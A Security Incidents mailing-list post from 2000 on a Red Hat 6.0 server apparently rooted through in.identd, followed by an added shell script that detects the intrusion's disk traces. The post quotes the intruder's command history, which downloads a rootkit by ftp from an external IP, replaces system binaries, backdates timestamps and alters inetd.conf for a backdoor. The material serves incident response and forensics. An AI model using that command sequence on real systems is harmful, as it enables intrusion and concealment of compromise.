Security Incidents mailing list archives

Rooted through in.identd on Red Hat 6.0


From: del () BABEL COM AU (Del Elson)
Date: Wed, 19 Apr 2000 05:02:13 -0000


Hi,

A client was hacked last week by what looked like a buffer
overflow through in.identd.  This was on a Red Hat 6.0
box.

RH don't have any current security notices or fixes for
in.identd on their servers, and I haven't seen other
boxes hacked through in.identd recently.

The hacker left the usual trace in /.bash_history, which
ran like:

mkdir /usr/lib/... ; cd /usr/lib/...
ftp 200.192.58.201 21
cd /usr/lib/...
mv netstat.gz? netstat.gz; mv ps.gz? ps.gz; mv pstree.gz? pstree.gz;
mv pt07.gz? pt07.gz; mv slice2.gz? slice2.gz; mv syslogd.gz? syslogd.gz;
mv tcpd.gz? tcpd.gz
gzip -d *
chmod +x *
mv netstat /bin ; mv ps /bin ; mv tcpd /usr/sbin/; mv syslogd /usr/sbin;
mv pt07 /usr/lib/; mv pstree /usr/bin ;
/usr/lib/pt07
echo "2 sh" >> /dev/cui220 ; echo "2 slice2" >> /dev/cui220 ;
echo "2 bnc" >> /dev/220 ; echo "4 6667" >> /dev/cui221 ;
echo "3 15678" >> /dev/cui221 ; echo "2 pt07" >> /dev/cui220 ;
echo "3 1679" >> /dev/cui221; echo "3 5454" >> /dev/cui221;
touch -t 199910122110 /dev/cui220
touch -t 199910122110 /dev/cui221
touch -t 199910122110 /usr/lib/pt07
touch -t 199910122110 /usr/sbin/syslogd
touch -t 199910122110 /usr/sbin/tcpd
touch -t 199910122110 /bin/ps
touch -t 199910122110 /bin/netstat
touch -t 199910122110 /usr/bin/pstree
cat /etc/inetd.conf | grep -v 15678 >> /tmp/b
mv /tmp/b /etc/inetd.conf
killall -HUP inetd

... installing a back door and a partial cover of tracks.

The only messages in /var/log/messages around the time
were:

Apr  8 23:15:57 home identd[12006]: Connection from 200.192.58.201
Apr  8 23:15:57 home identd[12006]: from: 200.192.58.201 ( 200.192.58.201 ) for: 1176, 21
Apr  8 23:16:05 home identd[12007]: Connection from 200.192.58.201
Apr  8 23:16:05 home identd[12007]: from: 200.192.58.201 ( 200.192.58.201 ) for: 1176, 21

... the IP address traces back to somewhere in Brazil.

Anyone know of any current bug notices, exploits, or
patches for in.identd?

Del


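The history Del quotes leaves three kinds of trace on disk: plain files parked under /dev (the kit's cui220/cui221 config), a staging directory named "..." under /usr/lib, and system binaries whose mtime was reset with touch -t. The script below is an added example, written for this archive page and not part of Del's post or of any Red Hat tool; it sweeps a root (the live / or a mounted image) for exactly those three traces and builds a throwaway test tree so it can be exercised offline. The file names come from the history; the checks, the one-day ctime/mtime threshold and the test-tree layout are assumptions, and GNU find and GNU stat are assumed.

```shell
#!/bin/sh
# Added example (not from Del's post): a sweep for the traces the bash_history
# above would leave on disk. The file names (cui220/cui221, the /usr/lib/...
# staging directory, the re-stamped binaries) come from the post; the checks,
# the thresholds and the staging-tree layout are assumptions for illustration.
# Every function takes an optional root so it can be run against a mounted
# image or a test tree instead of the live /. GNU find and GNU stat assumed.

# 1. Regular files under /dev. A device directory should hold device nodes,
#    symlinks and a few directories; the kit parked its config in
#    /dev/cui220 and /dev/cui221, which are plain files.
dev_regular_files() {
    find "${1:-/}/dev" -type f 2>/dev/null
}

# 2. Directories whose name is nothing but dots ("...", "....") under the
#    binary and library trees, like the /usr/lib/... staging area in the history.
dot_dirs() {
    root="${1:-/}"
    find "$root/bin" "$root/sbin" "$root/lib" "$root/usr/bin" "$root/usr/sbin" "$root/usr/lib" \
        -type d -name '.*' 2>/dev/null | grep -E '/\.{3,}$' || true
}

# 3. Re-stamped files. touch -t rewrites mtime, but the kernel bumps ctime at
#    the same moment, so a ctime much newer than mtime means the file was
#    written or re-stamped long after the date it claims. Prints path, mtime
#    and ctime (epoch seconds) for every file whose gap exceeds $2 seconds.
backdated() {
    root="${1:-/}"
    gap="${2:-86400}"   # one day (assumed threshold)
    find "$root/bin" "$root/sbin" "$root/usr/bin" "$root/usr/sbin" "$root/usr/lib" \
        -type f 2>/dev/null |
    while IFS= read -r f; do
        set -- $(stat -c '%Y %Z' "$f")        # $1 = mtime, $2 = ctime
        [ $(( $2 - $1 )) -gt "$gap" ] && printf '%s mtime=%s ctime=%s\n' "$f" "$1" "$2"
    done
    return 0
}

# Constructed test tree (not a real image) reproducing the end state the
# history above leaves behind, so the sweep can be exercised offline.
make_sample_tree() {
    d=$(mktemp -d)
    mkdir -p "$d/dev" "$d/usr/lib/..." "$d/bin" "$d/sbin" "$d/lib" "$d/usr/bin" "$d/usr/sbin"
    printf '2 sh\n2 slice2\n2 pt07\n' > "$d/dev/cui220"
    printf '4 6667\n3 15678\n' > "$d/dev/cui221"
    : > "$d/usr/lib/pt07"
    : > "$d/bin/ps"
    : > "$d/bin/untouched"      # a file nobody re-stamped; must not be flagged
    touch -t 199910122110 "$d/dev/cui220" "$d/dev/cui221" "$d/usr/lib/pt07" "$d/bin/ps"
    echo "$d"
}

if [ "${1:-}" = "--demo" ]; then
    T=$(make_sample_tree)
    echo "== regular files under dev"; dev_regular_files "$T"
    echo "== dot directories";         dot_dirs "$T"
    echo "== re-stamped files";        backdated "$T"
    rm -rf "$T"
fi
```

Run it as `sh sweep.sh --demo` to see the three checks fire on the constructed tree, or call the functions with the mount point of an image taken from the compromised box. The ctime check is the one a kit of this kind cannot defeat from userland, because touch -t cannot set ctime. On the real Red Hat 6.0 host, `rpm -Va` is the complementary check: it compares every packaged file's size, MD5 and mtime against the rpm database, so the replaced /bin/ps, /bin/netstat, /usr/bin/pstree, /usr/sbin/syslogd and /usr/sbin/tcpd show up there unless the attacker also edited the database.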